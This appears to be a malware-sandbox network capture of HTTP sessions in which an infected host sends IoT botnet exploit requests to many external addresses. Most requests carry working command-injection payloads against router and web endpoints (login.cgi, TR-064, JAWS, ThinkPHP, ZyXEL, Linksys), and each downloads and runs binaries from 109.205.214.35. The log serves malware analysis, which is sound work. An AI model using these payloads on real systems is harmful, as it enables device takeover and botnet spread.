                                                        Mar 21, 2024 05:23:12.712145090 CET1286INData Raw: 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a
                                                        Data Ascii: } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } foote
                                                        Mar 21, 2024 05:23:12.712233067 CET1286INData Raw: 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36
                                                        Data Ascii: float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0;
                                                        Mar 21, 2024 05:23:12.712285042 CET1286INData Raw: 6b 6c 34 30 76 78 4a 6b 5a 2b 44 4f 32 4e 75 2f 33 48 6e 79 43 37 74 31 35 6f 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66
                                                        Data Ascii: kl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt
                                                        Mar 21, 2024 05:23:12.712325096 CET1286INData Raw: 32 74 69 57 66 63 46 6e 68 30 68 50 49 70 59 45 56 47 6a 6d 42 41 65 32 62 39 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52
                                                        Data Ascii: 2tiWfcFnh0hPIpYEVGjmBAe2b95U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5K
                                                        Mar 21, 2024 05:23:12.712359905 CET1122INData Raw: 49 77 4a 74 4c 79 37 75 4e 36 50 65 2f 77 41 6e 72 42 78 4f 6e 41 61 79 49 53 4c 57 6b 51 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30
                                                        Data Ascii: IwJtLy7uN6Pe/wAnrBxOnAayISLWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g
                                                        Mar 21, 2024 05:23:12.712428093 CET1286INData Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20
                                                        Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to slmp-550-68.slc.westdc.net's <a href="mailto:cpane
                                                        Mar 21, 2024 05:23:12.712440968 CET375INData Raw: 65 6c 77 68 6d 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 63 70 6c 6f 67 6f 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 30 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 61
                                                        Data Ascii: elwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyri


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1059192.168.2.1346744212.227.182.17780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:12.140260935 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:13.164227009 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:14.348263025 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:16.912246943 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:17.135711908 CET175INHTTP/1.1 400 Bad Request: missing required Host header
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close
                                                        Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3a 20 6d 69 73 73 69 6e 67 20 72 65 71 75 69 72 65 64 20 48 6f 73 74 20 68 65 61 64 65 72
                                                        Data Ascii: 400 Bad Request: missing required Host header


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1060192.168.2.133509031.111.34.1657547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:12.257957935 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1061192.168.2.1343738199.80.62.12980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:12.263622999 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:12.359280109 CET416INHTTP/1.1 404 Not Found
                                                        Date: Thu, 21 Mar 2024 04:23:12 GMT
                                                        Server: Apache
                                                        Content-Length: 203
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1062192.168.2.1349648112.184.185.18680
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:12.509198904 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:12.809735060 CET502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 21 Mar 2024 04:23:11 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1063192.168.2.133525838.239.25.7580
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:12.566543102 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:12.862054110 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:23:12 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1064192.168.2.1334912206.108.48.1480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:12.632848024 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:13.555322886 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1065192.168.2.1341682213.251.224.1980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:12.684412003 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:12.895154953 CET484INHTTP/1.1 404 Not Found
                                                        Date: Thu, 21 Mar 2024 04:23:12 GMT
                                                        Server: Apache/2.2.15 (CentOS)
                                                        Content-Length: 292
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at 127.0.0.1 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1066192.168.2.1337632172.65.215.17055555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:12.964939117 CET438OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1067192.168.2.1344032184.56.204.538080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:13.057738066 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:13.772253990 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1068192.168.2.134948283.64.209.10480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:13.107112885 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:13.316000938 CET322INHTTP/1.1 403 Forbidden
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:23:13 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 162
                                                        Connection: keep-alive
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                                                        Mar 21, 2024 05:23:13.316020012 CET178INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1069192.168.2.1346650178.67.214.15880
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:13.113178015 CET423OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:13.338679075 CET497INHTTP/1.1 404 Not Found
                                                        Cache-Control: no-cache
                                                        Content-Type: text/html
                                                        Content-Length: 345
                                                        Date: Mon, 02 Feb 1970 17:11:13 GMT
                                                        Server: lighttpd
